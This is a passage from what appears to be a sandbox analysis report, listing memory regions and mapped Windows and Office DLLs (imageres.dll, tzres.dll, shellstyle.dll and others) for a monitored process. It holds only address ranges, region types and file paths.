"private_0x000000007efd5000" filename = "" Region: id = 651 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 652 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 653 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 654 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 655 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 656 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 657 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 658 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 659 start_va = 0x9670000 end_va = 0x9670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009670000" filename = "" Region: id = 660 start_va = 0x67d40000 end_va = 0x67d45fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\oregres.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\oregres.dll") Region: id = 661 start_va = 0x9680000 end_va = 0x9683fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll.mui" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\en-us\\oregres.dll.mui" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\en-us\\oregres.dll.mui") Region: id = 662 start_va = 0x677d0000 end_va = 0x677fdfff monitored = 0 entry_point = 0x677d1bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 663 start_va = 0x747d0000 end_va = 0x7524ffff monitored = 0 entry_point = 0x747d6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 664 start_va = 0x74790000 end_va = 0x747cbfff monitored = 0 entry_point = 0x74793089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 665 start_va = 0x9680000 end_va = 0x9680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 666 start_va = 0x9690000 end_va = 0x9691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009690000" filename = "" Region: id = 667 start_va = 0x96a0000 end_va = 0x96a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000096a0000" filename = "" Region: id = 668 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 669 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 670 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 671 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 672 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 673 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 674 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 675 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 676 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 677 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 678 start_va = 0x96f0000 end_va = 0x9745fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 679 start_va = 0xe090000 end_va = 0xe28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e090000" filename = "" Region: id = 680 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 681 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 682 start_va = 0xb7d0000 end_va = 0xb80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7d0000" filename = "" Region: id = 683 start_va = 0xde70000 end_va = 0xdf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000de70000" filename = "" Region: id = 684 start_va = 0x7ef4e000 end_va = 0x7ef50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef4e000" filename = "" Region: id = 685 start_va = 0x65110000 end_va = 0x66465fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 686 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 687 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 688 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 689 start_va = 0x65110000 end_va = 0x66465fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 690 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 691 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 692 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 693 start_va = 0x65110000 end_va = 0x66465fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 694 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 695 start_va = 0xe3b0000 end_va = 0xe4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e3b0000" filename = "" Region: id = 696 start_va = 0xe3b0000 end_va = 0xe4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e3b0000" filename = "" Region: id = 697 start_va = 0x9700000 end_va = 0x973ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009700000" filename = "" Region: id = 698 start_va = 0xe420000 end_va = 0xe51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e420000" filename = "" Region: id = 699 start_va = 0x7ef4b000 end_va = 0x7ef4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef4b000" filename = "" Region: id = 700 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 701 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 702 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 703 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 704 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 705 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 706 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 707 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 708 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 709 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 710 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 711 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 712 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 713 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 714 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 715 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 716 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 717 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 718 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 719 start_va = 0xe520000 end_va = 0xe620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 720 start_va = 0x662d0000 end_va = 0x66467fff monitored = 0 entry_point = 0x662d12a1 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 721 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 722 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 723 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 724 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 725 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 726 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 727 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 728 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 729 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 730 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 731 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 732 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 733 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 734 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 735 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 736 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 737 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 738 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 739 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 740 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 741 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 742 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 743 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 744 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 745 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 746 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 747 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 748 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 749 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 750 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 751 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 752 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 753 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 754 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 755 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 756 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 757 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 758 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 759 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 760 start_va = 0x9740000 end_va = 0x9746fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 761 start_va = 0x753d0000 end_va = 0x75401fff monitored = 0 entry_point = 0x753d37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 762 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 763 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 764 start_va = 0x64f70000 end_va = 0x662c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 765 start_va = 0x96f0000 end_va = 0x96f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 766 start_va = 0x73ff0000 end_va = 0x7401afff monitored = 0 entry_point = 0x7400d3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 767 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 768 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 769 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 770 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 771 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 772 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 773 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 774 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 775 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 776 start_va = 0x96f0000 end_va = 0x96f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096f0000" filename = "" Region: id = 777 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 778 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 779 start_va = 0x64f70000 end_va = 0x662c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 780 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 781 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 782 start_va = 0x64f70000 end_va = 0x662c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 783 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file 